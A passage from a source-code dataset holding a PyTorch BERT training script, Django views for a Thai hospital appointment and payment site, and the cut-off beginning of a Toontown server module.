Path Sum/Minimum Path Sum.py","file_name":"Minimum Path Sum.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637163151","text":"from torch import nn\nimport torch.nn.functional as F\nfrom pytorch_pretrained_bert.modeling import BertModel, BertPreTrainedModel\nfrom pytorch_pretrained_bert.optimization import BertAdam\nimport torch.optim as optim\nimport torch, os\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else 'cpu')\n# 定义模型\nclass BertClassification(BertPreTrainedModel):\n def __init__(self, config):\n super(BertClassification,self).__init__(config)\n self.num_labels = 2\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(0.5)\n self.fc = nn.Linear(config.hidden_size, 2)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, input_mask, label_ids):\n _,pooled_output = self.bert(input_ids,None,input_mask,output_all_encoded_layers=False)\n pooled_output = self.dropout(pooled_output)\n logits = self.fc(pooled_output)\n if label_ids is not None:\n loss_fct = F.cross_entropy()\n return loss_fct(logits.view(-1,self.num_labels),label_ids.view(-1))\n return logits\n\n\ndef berttrain(train_iter, dev_iter, num_train_steps, model, args):\n \n optimizer = BertAdam(model.parameters(), lr=2e-5, schedule='warmup_linear', warmup=0.1, t_total=num_train_steps)\n\n best_acc = 0\n steps = 0\n last_step = 0\n model = model.to(device)\n model.train()\n print('training...')\n for epoch in range(args.bert_epochs):\n for batch in train_iter:\n feature, target, mask = batch[1], batch[0], batch[2] #(W,N) (N)\n feature = feature.to(device)\n target = target.to(device)\n mask = mask.to(device)\n # 清除梯度\n optimizer.zero_grad()\n output = model(feature, mask, None)\n loss = F.cross_entropy(output, target)\n loss.backward()\n optimizer.step()\n \n steps += 1\n if steps % 10 == 0:\n result = torch.max(output,1)[1].view(target.size())\n corrects = (result.data == target.data).sum()\n accuracy = corrects*100.0/len(batch[0])\n print('\\rBatch[{}] - loss: {:.6f} acc: {:.4f}'.format(\n steps, loss.data.item(), accuracy))\n\n if steps % 200 == 0:\n save(model,args.save_dir,'snapshot',steps)\n dev_acc = eval(dev_iter, model, args)\n if dev_acc > best_acc:\n best_acc = dev_acc\n last_step = steps\n if args.save_best:\n save(model,args.save_dir,'best',steps)\n\n\ndef save(model, save_dir, save_prefix, steps):\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n save_prefix = 
os.path.join(save_dir,save_prefix)\n save_path = '{}_steps_{}.pt'.format(save_prefix,steps)\n torch.save(model.state_dict(),save_path)\n\ndef eval(data_iter, model, args):\n model.eval()\n corrects, avg_loss = 0,0\n for batch in data_iter:\n feature, target, mask = batch[1], batch[0], batch[2] #(W,N) (N)\n feature = feature.to(device)\n target = target.to(device)\n mask = mask.to(device)\n logit = model(feature, mask, None)\n loss = F.cross_entropy(logit,target)\n \n avg_loss += loss.data\n result = torch.max(logit,1)[1]\n corrects += (result.view(target.size()).data == target.data).sum()\n \n size = len(data_iter.dataset)\n avg_loss /= size \n accuracy = 100.0 * corrects/size\n print('\\nEvaluation - loss: {:.6f} acc: {:.4f} \\n'.format(avg_loss, accuracy))\n \n return accuracy\n\n","sub_path":"distill_test/Berttrain.py","file_name":"Berttrain.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"597714937","text":"from django.shortcuts import render\nfrom django.http import HttpRequest, Http404, JsonResponse\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom datetime import datetime\nfrom django.template.defaulttags import register\nfrom html_json_forms import parse_json_form\nfrom bson.objectid import ObjectId\nimport re\nimport json\n# Create your views here.\nfrom .API.API import API\napi = API()\n\nimport omise\n\ntry:\n from config import OMISE_SECRET_KEY, OMISE_PUBLIC_KEY, OMISE_API_VERSION\nexcept ImportError:\n pass\n\n\nomise.api_secret = OMISE_SECRET_KEY\nomise.api_public = OMISE_PUBLIC_KEY\nomise.api_version = OMISE_API_VERSION\n\nblood_abo = ['-', 'A', 'B', 'O', 'AB']\nblood_rh = ['', 'RH-', 'RH+']\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\ndef check_logged_in(request):\n return 'user' in request.session and request.session['user'].get('is_authenticated')\n\ndef home(request):\n \"\"\"Renders the home page.\"\"\"\n assert isinstance(request, HttpRequest)\n return redirect('/departments')\n\ndef check_user_information(request):\n return JsonResponse({'hasInfo': api.get_patient_id(request.GET.get('username'))[0]})\n\ndef departments(request):\n \"\"\"Renders the about page.\"\"\"\n if 'selected_package' in request.session:\n del request.session['selected_package']\n assert isinstance(request, HttpRequest)\n status, result = api.show_departments()\n return render(\n request,\n 'app/departments.html',\n {\n 'title': 'แผนกและแพ็คเกจ',\n 'departments': result,\n 'logged_user': request.session.get('user')\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef about(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/about.html',\n {\n 'title': 'About',\n 'message': 'Your application description page.',\n 'year': datetime.now().year,\n 'logged_user': request.session.get('user')\n }\n )\n\ndef contact(request):\n if not check_logged_in(request):\n return redirect('/login/?next=/contact/')\n \"\"\"Renders the contact page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/contact.html',\n {\n 'title': 'Contact',\n 'message': 'Your contact page.',\n 'year': datetime.now().year,\n 'logged_user': request.session.get('user')\n }\n )\n\ndef 
check_reserved_time(request):\n doctor = api.show_doctor_detail(request.session['selected_doctor'])[1]\n free = True\n for reservation in doctor['reserved']:\n if reservation.hour == int(request.GET.get('hour')) and reservation.day == int(request.GET.get('day')) and reservation.month == int(request.GET.get('month')) and reservation.year == int(request.GET.get('year')):\n free = False\n break\n return JsonResponse({'free': free})\n\n@login_required(login_url='/accounts/login')\ndef doctor_detail(request):\n \"\"\"Renders the about page.\"\"\"\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session:\n return redirect('/doctor-search')\n if request.method == 'POST':\n request.session['selected_date'] = json.loads(request.POST['date'])\n return redirect('/confirm/')\n assert isinstance(request, HttpRequest)\n status, doctor = api.show_doctor_detail(request.session['selected_doctor'])\n if status:\n status, package = api.show_special_package_info(\n request.session['selected_package'])\n working_times = {}\n for day in doctor['working_time']:\n if doctor['working_time'][day] != []:\n working_times[day] = []\n for time in doctor['working_time'][day]:\n for i in range(int(time['start']), int(time['finish'])):\n working_times[day].append(\n {'start': i, 'finish': i + 1})\n # print(working_times)\n return render(\n request,\n 'app/doctor-detail.html',\n {\n 'title': 'ข้อมูลแพทย์',\n 'doctor': doctor,\n 'selected_package': package,\n 'working_time': working_times,\n 'logged_user': request.session.get('user')\n }\n )\n else:\n raise Http404(\"No doctor found\")\n\n@login_required(login_url='/accounts/login')\ndef doctor_profile(request):\n \"\"\"Renders the about page.\"\"\"\n if not check_user_group('doctor', request.user):\n raise PermissionDenied\n doctor_id = api.get_doctor_id(request.user.username)[1]\n status, doctor = api.show_doctor_detail(doctor_id)\n status, orders = api.get_doctor_orders(doctor_id)\n return render(\n request,\n 'app/doctor-profile.html',\n {\n 'title': 'ข้อมูลแพทย์',\n 'doctor': doctor,\n 'orders': orders,\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef member(request):\n global blood_abo, blood_rh\n assert isinstance(request, HttpRequest)\n if not api.get_patient_id(request.user.username)[0] or len(request.user.groups.all()) > 0:\n return redirect('/register')\n status, patient_id = api.get_patient_id(request.user.username)\n status, member_detail = api.get_patient_detail(patient_id)\n status, orders = api.get_patient_orders(request.user.username)\n return render(\n request,\n 'app/member.html',\n {\n 'title': 'ข้อมูลสมาชิก',\n 'member_detail': member_detail,\n 'orders': orders,\n 'logged_user': request.user.username\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef treat(request, order_id):\n if not check_user_group('doctor', request.user):\n raise PermissionDenied\n global blood_abo, blood_rh\n if request.method == 'POST':\n status, result = api.insert_note(order_id, request.POST.get('treating-detail'))\n if status:\n return redirect('/doctor-profile')\n assert isinstance(request, HttpRequest)\n order_detail = api.get_order_detail(order_id)[1]\n status, patient_detail = api.get_patient_detail(order_detail['patient_id'])\n # member_detail['blood_group_abo'] = blood_abo[member_detail['blood_group_abo']]\n # member_detail['blood_group_rh'] = blood_rh[member_detail['blood_group_rh']]\n return render(\n request,\n 'app/member-profile.html',\n {\n 'title': 'การรักษา',\n 'member_detail': patient_detail,\n 'note': 
order_detail['note']\n        }\n    )\n\n@login_required(login_url='/accounts/login')\ndef edit_member_info(request):\n    if len(request.user.groups.all()) > 0:\n        raise PermissionDenied\n    elif not api.get_patient_id(request.user.username)[0]:\n        return redirect('/register')\n    assert isinstance(request, HttpRequest)\n    if request.method == 'POST':\n        email = request.POST['email']\n        # status = request.POST['status']\n        telephone_number = request.POST['telephone_number']\n        emergency_phone = request.POST['emergency_phone']\n        status, patient_id = api.get_patient_id(request.user.username)\n        status, member_detail = api.get_patient_detail(patient_id)\n\n        # Take the email, status, etc. values, put them into the fields of the member_detail dict, then pass each member_detail field as a parameter in the function below\n        member_detail['email'] = email\n        # member_detail['status'] = status\n        member_detail['blood_group_rh'] = 'none' if member_detail['blood_group_rh'] in [None, 'None'] else member_detail['blood_group_rh']\n        member_detail['blood_group_abo'] = 'none' if member_detail['blood_group_abo'] in [None, 'None'] else member_detail['blood_group_abo']\n        member_detail['status'] = 'none' if member_detail['status'] in [None, 'None'] else member_detail['status']\n        member_detail['telephone_number'] = telephone_number\n        member_detail['emergency_phone'] = emergency_phone\n        # print(member_detail)\n        # member_detail['birthday'] = {'day': member_detail['birthday'].day, 'month': member_detail['birthday'].month, 'year': member_detail['birthday'].year}\n        query_status, result = api.update_patient(patient_id, member_detail)\n        if query_status:\n            return redirect('..')\n    blood_abo = ['-', 'A', 'B', 'O', 'AB']\n    blood_rh = ['', 'RH-', 'RH+']\n    status, patient_id = api.get_patient_id(request.user.username)\n    status, member_detail = api.get_patient_detail(patient_id)\n    # member_detail['gender'] = 'ชาย' if member_detail['gender'] else 'หญิง'\n    # member_detail['blood_group_abo'] = blood_abo[member_detail['blood_group_abo']]\n    # member_detail['blood_group_rh'] = blood_rh[member_detail['blood_group_rh']]\n    birthday_list = str(member_detail['birthday']).split('-')\n    member_detail['birthday'] = {'day': birthday_list[2], 'month': birthday_list[1], 'year': birthday_list[0]}\n    member_detail['congenital_disease'] = ', '.join(member_detail['congenital_disease']) if type(member_detail['congenital_disease']) == type([]) else ''\n    return render(\n        request,\n        'app/edit-member.html',\n        {\n            'title': 'แก้ไขข้อมูลสมาชิก',\n            'member_detail': member_detail,\n            'logged_user': request.user.username\n        }\n    )\n\n\ndef regular_packages(request):\n    \"\"\"Renders the regular packages page.\"\"\"\n    if request.method == 'POST':\n        request.session['selected_package'] = request.POST['package']\n        return redirect('/doctor-search/')\n    assert isinstance(request, HttpRequest)\n    status, result = api.show_general_list()\n    return render(\n        request,\n        'app/regular-package.html',\n        {\n            'title': 'ตรวจสุขภาพทั่วไป',\n            'packages': result,\n            'logged_user': request.session.get('user')\n        }\n    )\n\n\ndef special_packages(request, package_id):\n    \"\"\"Renders the special package detail page.\"\"\"\n    assert isinstance(request, HttpRequest)\n    if request.method == 'POST':\n        request.session['selected_package'] = request.POST['package']\n        return redirect('/doctor-search/')\n    status, result = api.show_special_package_info(package_id)\n    # print(result)\n    return render(\n        request,\n        'app/special_packages.html',\n        {\n            'title': 'รายละเอียดแพ็คเกจ',\n            'package': result,\n            'package_id': package_id,\n            'logged_user': request.session.get('user')\n        }\n    
)\n\n@login_required(login_url='/accounts/login')\ndef search_for_doctor(request):\n \"\"\"Renders the about page.\"\"\"\n if 'selected_package' not in request.session:\n return redirect('/departments/')\n if request.method == 'POST':\n request.session['selected_doctor'] = request.POST['doctor_id']\n return redirect('/doctor-detail/')\n # print(request.session['selected_package'])\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/doctor-search.html',\n {\n 'title': 'ค้นหาแพทย์',\n 'logged_user': request.session.get('user')\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef doctor_search_api(request):\n package_id = request.session['selected_package']\n days = request.GET.get('days').split(\n ',') if request.GET.get('days') != None else None\n time = request.GET.get('time')\n # print(time)\n doctor_firstname = request.GET.get('doctor_firstname')\n doctor_lastname = request.GET.get('doctor_surname')\n gender = request.GET.get('gender')\n status, result = api.find_doctors(\n package_id, days, time, doctor_firstname, doctor_lastname, gender)\n return JsonResponse({'status': status, 'result': result})\n\n@login_required(login_url='/accounts/login')\ndef doctor_auto_search_api(request):\n package_id = request.session['selected_package']\n status, result = api.auto_find_doctors(package_id)\n return JsonResponse({'status': status, 'result': result})\n\n\ndef doctor(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n if request.method == 'POST':\n request.session['selected_package'] = request.POST['package_id']\n request.session['selected_doctor'] = request.POST['doctor_id']\n return redirect('/doctor-detail/')\n status, result = api.show_doctor_in_department()\n # print(result)\n return render(\n request,\n 'app/doctor.html',\n {\n 'title': 'แผนกและแพทย์',\n 'departments': result,\n 'logged_user': request.session.get('user')\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef confirm(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n elif not api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session or 'selected_date' not in request.session:\n return redirect('/doctor-detail/')\n if request.method == 'POST':\n return redirect('/payment')\n # print(request.session['selected_date'])\n status, package = api.show_special_package_info(\n request.session['selected_package'])\n status, doctor = api.show_doctor_detail(request.session['selected_doctor'])\n month = [\n 'มกราคม',\n 'กุมภาพันธ์',\n 'มีนาคม',\n 'เมษายน',\n 'พฤษภาคม',\n 'มิถุนายน',\n 'กรกฎาคม',\n 'สิงหาคม',\n 'กันยายน',\n 'ตุลาคม',\n 'พฤศจิกายน',\n 'ธันวาคม',\n ]\n return render(\n request,\n 'app/confirm.html',\n {\n 'title': 'ยืนยันแพ็คเกจ',\n 'selected_package': package,\n 'selected_doctor': doctor,\n 'selected_date': request.session['selected_date']['date'],\n 'selected_month': month[request.session['selected_date']['month'] - 1],\n 'selected_year': request.session['selected_date']['year'],\n 'selected_start_hr': request.session['selected_date']['start_hr'],\n 'selected_finish_hr': request.session['selected_date']['finish_hr'],\n 'logged_user': request.user.username\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef payment(request):\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n elif not 
api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session or 'selected_date' not in request.session:\n return redirect('/doctor-detail/')\n return render(\n request,\n 'app/payment.html',\n {\n 'title': 'เลือกวิธีชำระค่าบริการ',\n }\n )\n\n\n@login_required(login_url='/accounts/login')\ndef payment_card(request):\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n elif not api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session or 'selected_date' not in request.session:\n return redirect('/doctor-detail/')\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n payment_error = False\n form_error = False\n if request.method == 'POST':\n patient_id = api.get_patient_id(request.user.username)[1]\n patient_detail = api.get_patient_detail(patient_id)[1]\n package_detail = api.show_special_package_info(request.session['selected_package'])[1]\n name = patient_detail['patient_name'] + ' ' + patient_detail['patient_surname']\n number = request.POST.get('cardNumber')\n if len(number) != 16 or not re.search('\\w\\w/\\w\\w', request.POST.get('cardExpiry')) or request.POST.get('cardCVC') == '000':\n form_error = True\n else:\n card_expiration = request.POST.get('cardExpiry').split('/')\n expiration_month = int(card_expiration[0])\n expiration_year = int(str(datetime.now().year)[:2] + card_expiration[1])\n security_code = int(request.POST.get('cardCVC'))\n price = package_detail['package_cost'] * 100\n\n try:\n token = omise.Token.create(\n name=name,\n number=number,\n expiration_month=expiration_month,\n expiration_year=expiration_year,\n security_code=security_code\n )\n\n charge = omise.Charge.create(\n amount=int(price),\n currency=\"thb\",\n card=token.id\n )\n\n\n if charge.paid and charge.authorized and not charge.failure_code:\n status, result = api.create_order(request.session['selected_package'], request.session['selected_doctor'],\n request.user.username, '-', request.session['selected_date'], charge.id)\n if status:\n return redirect(\"/\")\n else:\n payment_error = True\n else:\n payment_error = True\n except Exception:\n payment_error = True\n return render(\n request,\n 'app/payment_card.html',\n {\n 'title': 'ชำระค่าบริการ',\n 'payment_error': payment_error,\n 'form_error': form_error\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef payment_bank(request):\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n elif not api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session or 'selected_date' not in request.session:\n return redirect('/doctor-detail/')\n if request.method == 'POST':\n package_detail = api.show_special_package_info(request.session['selected_package'])[1]\n price = package_detail['package_cost'] * 100\n bank = request.POST.get('bank')\n source = omise.Source.create(\n amount=int(price),\n currency='thb',\n type=bank\n )\n charge = omise.Charge.create(\n amount=int(price) ,\n currency=\"thb\",\n return_uri= \"http://localhost:8000/payment/bank\",\n source=source.id\n )\n request.session['charge_token'] = charge.id\n return redirect(charge.authorize_uri) \n \n if 'charge_token' in request.session:\n charge = omise.Charge.retrieve(request.session['charge_token'])\n if charge and 
charge.paid and charge.authorized:\n # print(vars(charge))\n status, result = api.create_order(request.session['selected_package'], request.session['selected_doctor'],\n request.user.username, '-', request.session['selected_date'], charge.id)\n if status:\n del request.session['charge_token']\n return redirect(\"/\")\n\n return render(\n request,\n 'app/payment_bank.html',\n {\n 'title': 'ชำระค่าบริการ',\n }\n )\n\ndef check_user_group(group_name, user):\n groups = user.groups.all()\n print(groups)\n return len(groups) > 0 and groups[0].name == group_name\n\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo(request):\n if not check_user_group('staff', request.user) and not request.user.is_superuser:\n raise PermissionDenied\n assert isinstance(request, HttpRequest)\n status, result = api.get_all_collections_name()\n result.sort()\n return render(\n request,\n 'app/admin_mongo.html',\n {\n 'title': 'mongoDB Admin',\n 'header_title': 'mongoDB Admin',\n 'collections': result,\n 'DATABASE': True,\n 'logo_link': '/admin-mongo',\n 'logged_user': request.session.get('user'),\n 'only_logout': True\n }\n )\n\ndef decode_data(data):\n for k, v in data.items():\n if type(v) == type({}):\n pass\n elif type(v) == type([]):\n pass\n else:\n data[k] = api.decode_thai_value(k, v)[1]\n\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo_collection(request, collection_name):\n if not check_user_group('staff', request.user) and not request.user.is_superuser:\n raise PermissionDenied\n assert isinstance(request, HttpRequest)\n permissions = {}\n if request.user.is_superuser:\n permissions = {'insert': 1, 'delete': 1, 'update': 1}\n else:\n permissions['insert'] = 1 if api.get_collection_permission(collection_name, 'insert')[0] else 0\n permissions['delete'] = 1 if api.get_collection_permission(collection_name, 'delete')[0] else 0\n permissions['update'] = 1 if api.get_collection_permission(collection_name, 'update')[0] else 0\n # print(collection_name)\n # print(permissions)\n status, data = api.admin_get_all_documents(collection_name)\n result = []\n for doc in data:\n tmp = {}\n for k, v in doc.items():\n if k == '_id':\n k = 'object_id'\n tmp[k] = v\n decode_data(tmp)\n result.append(tmp)\n return render(\n request,\n 'app/admin_mongo.html',\n {\n 'title': 'mongoDB Admin',\n 'header_title': 'mongoDB Admin',\n 'collection_name': collection_name,\n 'permissions': permissions,\n 'data': result,\n 'COLLECTION': True,\n 'toolbar': True,\n 'logo_link': '/staff',\n 'logged_user': request.session.get('user'),\n 'only_logout': True\n }\n )\n\ndef clean_field(org, res, name=''):\n for field in org:\n tmp = field['field_name']\n if name != '':\n tmp = '[' + tmp + ']'\n if field['field_type'] == 'dict':\n clean_field(field['dict'], res, name + tmp)\n elif field['field_type'] == 'list' and field['value'] == 'dict':\n clean_field(field['dict'], res, name + tmp + '[0]')\n else:\n this_field = {'field_name': name + tmp, 'field_type': field['field_type']}\n if 'value' in field:\n this_field['value'] = field['value']\n res.append(this_field)\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo_add(request, collection_name):\n if not check_user_group('staff', request.user) and not request.user.is_superuser:\n raise PermissionDenied\n if request.method == 'POST':\n tmp = dict(request.POST)\n for key in tmp:\n tmp[key] = tmp[key][0]\n del tmp['csrfmiddlewaretoken']\n # return JsonResponse(parse_json_form(tmp))\n # print(parse_json_form(tmp))\n status, result = 
api.admin_insert_document(collection_name, parse_json_form(tmp))\n        if status:\n            return redirect('..')\n        else:\n            return redirect('.')\n    status, fields = api.get_collection_pattern(collection_name)\n    found_id = False\n    for i in range(len(fields)):\n        if fields[i]['field_name'] == '_id':\n            found_id = True\n            index = i\n            break\n    if found_id:\n        del fields[index]\n    # print(fields)\n    return render(\n        request,\n        'app/admin_mongo-add.html',\n        {\n            'title': 'mongoDB Admin',\n            'header_title': 'mongoDB Admin',\n            'collection_name': collection_name,\n            'fields': json.dumps(fields),\n            'logo_link': '/staff',\n            'only_logout': True\n        }\n    )\n\ndef clean_datatype(data):\n    for k, v in data.items():\n        if type(v) == type(datetime.now()) or type(v) == type(ObjectId()):\n            data[k] = str(v)\n        elif type(v) == type({}):\n            clean_datatype(data[k])\n        elif type(v) == type([]):\n            for i in range(len(v)):\n                # stringify each element in place, not the whole list\n                if type(v[i]) == type(datetime.now()) or type(v[i]) == type(ObjectId()):\n                    v[i] = str(v[i])\n                elif type(v[i]) == type({}):\n                    clean_datatype(v[i])\n\ndef fill_field(fields, data):\n    for field in fields:\n        if data == None or data.get(field['field_name']) == None:\n            if field['field_type'] == 'dict':\n                fill_field(field['dict'], None)\n            elif data != None:\n                data[field['field_name']] = None\n        elif field['field_type'] == 'date':\n            tmp = data[field['field_name']].split('-')\n            data[field['field_name']] = {\n                'year': tmp[0],\n                'month': tmp[1],\n                'day': tmp[2]\n            }\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo_edit(request, collection_name, object_id):\n    if not check_user_group('staff', request.user) and not request.user.is_superuser:\n        raise PermissionDenied\n    if request.method == 'POST':\n        tmp = dict(request.POST)\n        for key in tmp:\n            tmp[key] = tmp[key][0]\n        del tmp['csrfmiddlewaretoken']\n        # return JsonResponse(parse_json_form(tmp))\n        data = parse_json_form(tmp)\n        status, fields = api.get_collection_pattern(collection_name)\n        fill_field(fields, data)\n        status, result = api.admin_update_document(collection_name, object_id, data)\n        if status:\n            return redirect('..')\n        else:\n            return redirect('.')\n    status, fields = api.get_collection_pattern(collection_name)\n    status, data = api.admin_get_detail(collection_name, object_id)\n    clean_datatype(data)\n    found_id = False\n    for i in range(len(fields)):\n        if fields[i]['field_name'] == '_id':\n            found_id = True\n            index = i\n            break\n    if found_id:\n        del fields[index]\n    return render(\n        request,\n        'app/admin_mongo-add.html',\n        {\n            'title': 'mongoDB Admin',\n            'header_title': 'mongoDB Admin',\n            'collection_name': collection_name,\n            'fields': json.dumps(fields).replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\"),\n            'data': json.dumps(data).replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\"),\n            'logo_link': '/staff',\n            'only_logout': True\n        }\n    )\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo_delete(request, collection_name, object_id):\n    if not check_user_group('staff', request.user) and not request.user.is_superuser:\n        raise PermissionDenied\n    if request.method == 'POST':\n        status, result = api.admin_delete_document(collection_name, object_id)\n        response = {'ok': 1 if status else 0}\n        return JsonResponse(response)\n    else:\n        pass\n\ndef login(request):\n    assert isinstance(request, HttpRequest)\n    if request.method == 'POST':\n        status, username = api.verify_password(\n            request.POST['username'], request.POST['password'])\n        if status:\n            status, result = api.check_already_used_this_username(\n                request.POST['username'])\n            if not status:\n                request.session['just_regis'] = True\n            request.session['user'] 
= {\n                'username': request.POST['username'], 'is_authenticated': True}\n            return redirect(request.POST['next'])\n\n        else:\n            return render(\n                request,\n                'app/login.html',\n                {\n                    'title': 'Log in',\n                    'error': True\n                }\n            )\n    if 'user' in request.session:  # mind add\n        if request.session['user'].get('is_authenticated'):  # mind one tab\n            return redirect('/')  # mind one tab\n    next_page = '/'\n    if 'next' in request.GET:\n        next_page = request.GET['next']\n    return render(\n        request,\n        'app/login.html',\n        {\n            'title': 'Log in',\n            'next': next_page\n        }\n    )\n\n@login_required(login_url=\"/accounts/login\")\ndef register(request):\n    if len(request.user.groups.all()) > 0:\n        raise PermissionDenied\n    \"\"\"Renders the about page.\"\"\"\n    if request.method == 'POST':\n        patient_name_title = request.POST['patient_name_title']\n        patient_name = request.POST['patient_name']\n        patient_surname = request.POST['patient_surname']\n        # patient_img = request.POST['patient_img']\n        id_card_number = request.POST['id_card_number']\n        gender = request.POST['gender'] == 'ชาย'\n        birthday = request.POST['birthday'].split('-')\n        birthday_day = int(birthday[2])\n        birthday_month = int(birthday[1])\n        birthday_year = int(birthday[0])\n        blood_group_abo = int(request.POST['blood_group_abo'])\n        race = request.POST['race']\n        nationallity = request.POST['nationallity']\n        religion = request.POST['religion']\n        Status = int(request.POST['status'])\n        patient_address = request.POST['patient_address']\n        occupy = request.POST['occupy']\n        telephone_number = request.POST['telephone_number']\n        father_name = request.POST['father_name']\n        mother_name = request.POST['mother_name']\n        emergency_name = request.POST['emergency_name']\n        emergency_phone = request.POST['emergency_phone']\n        emergency_addr = request.POST['emergency_addr']\n        email = request.POST['email']\n        congenital_disease = request.POST['congenital_disease'].split(',')\n        # Fill in all of the remaining fields\n        status, result = api.register(request.user.username, patient_name_title, patient_name, patient_surname, '',\n                                      id_card_number, gender, birthday_year, birthday_month, birthday_day,\n                                      blood_group_abo, 0, race, nationallity, religion, Status,\n                                      patient_address, occupy, telephone_number, father_name, mother_name, emergency_name,\n                                      emergency_phone, emergency_addr, email, congenital_disease, True)\n        print(result)\n        if status:\n            return redirect('/')\n        else:\n            return render(\n                request,\n                'app/register.html',\n                {\n                    'title': 'ข้อมูลผู้ป่วย',\n                    'logged_user': request.user.username,\n                    'REGISTER_PAGE': True\n                }\n            )\n    else:\n        return render(\n            request,\n            'app/register.html',\n            {\n                'title': 'ข้อมูลผู้ป่วย',\n                'logged_user': request.user.username,\n                'REGISTER_PAGE': True\n            }\n        )\n","sub_path":"kkhospital/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":31794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"149448043","text":"import toontown.minigame.MinigameCreatorAI\nfrom toontown.distributed.ToontownDistrictAI import ToontownDistrictAI\nfrom toontown.distributed.ToontownDistrictStatsAI import ToontownDistrictStatsAI\nfrom otp.ai.TimeManagerAI import TimeManagerAI\nfrom otp.ai.MagicWordManagerAI import MagicWordManagerAI\nfrom toontown.ai.HolidayManagerAI import HolidayManagerAI\nfrom toontown.ai.NewsManagerAI import NewsManagerAI\nfrom toontown.ai.FishManagerAI import FishManagerAI\nfrom toontown.safezone.SafeZoneManagerAI import SafeZoneManagerAI\nfrom toontown.distributed.ToontownInternalRepository import ToontownInternalRepository\nfrom 
toontown.toon import NPCToons\nfrom toontown.hood import TTHoodDataAI, DDHoodDataAI, DGHoodDataAI, BRHoodDataAI, MMHoodDataAI, DLHoodDataAI, FFHoodDataAI\nfrom toontown.hood import OZHoodDataAI, GSHoodDataAI, GZHoodDataAI, ZoneUtil\nfrom toontown.hood import SellbotHQDataAI, CashbotHQDataAI, LawbotHQDataAI, BossbotHQDataAI\nfrom toontown.toonbase import ToontownGlobals\nfrom direct.distributed.PyDatagram import *\nfrom otp.ai.AIZoneData import *\nfrom toontown.dna.DNAParser import *\nfrom toontown.coghq import MintManagerAI, FactoryManagerAI, LawOfficeManagerAI, CountryClubManagerAI\nfrom otp.friends.FriendManagerAI import FriendManagerAI\nfrom toontown.estate.EstateManagerAI import EstateManagerAI\nfrom toontown.uberdog.DistributedPartyManagerAI import DistributedPartyManagerAI\nfrom otp.distributed.OtpDoGlobals import *\nfrom direct.task import Task\nfrom toontown.toonbase import ToontownGlobals\nfrom toontown.effects.DistributedFireworkShowAI import DistributedFireworkShowAI\nfrom toontown.effects import FireworkShows\nimport random\nfrom direct.distributed.ClockDelta import *\nimport time, os, datetime, sys\nfrom otp.ai.MagicWordGlobal import *\nfrom toontown.parties import PartyGlobals\n\nfrom toontown.tutorial.TutorialManagerAI import TutorialManagerAI\nfrom DistributedSuitInvasionManagerAI import DistributedSuitInvasionManagerAI, SuitDNA\nfrom QuestManagerAI import QuestManagerAI\nfrom PromotionManagerAI import PromotionManagerAI\nfrom toontown.battle.CogPageManagerAI import CogPageManagerAI\nfrom toontown.coghq.CogSuitManagerAI import CogSuitManagerAI\nfrom toontown.building.DistributedTrophyMgrAI import *\nfrom toontown.estate.DistributedBankMgrAI import *\nfrom toontown.catalog.CatalogManagerAI import *\nfrom toontown.pets.PetManagerAI import *\n\nhoods = (TTHoodDataAI.TTHoodDataAI, DDHoodDataAI.DDHoodDataAI, DGHoodDataAI.DGHoodDataAI,\n BRHoodDataAI.BRHoodDataAI, MMHoodDataAI.MMHoodDataAI, DLHoodDataAI.DLHoodDataAI,\n GSHoodDataAI.GSHoodDataAI, OZHoodDataAI.OZHoodDataAI, GZHoodDataAI.GZHoodDataAI,\n SellbotHQDataAI.SellbotHQDataAI, CashbotHQDataAI.CashbotHQDataAI,\n LawbotHQDataAI.LawbotHQDataAI, BossbotHQDataAI.BossbotHQDataAI,\n #FFHoodDataAI.FFHoodDataAI\n)\n \nimport DistributedResistanceEmoteMgrAI\nimport 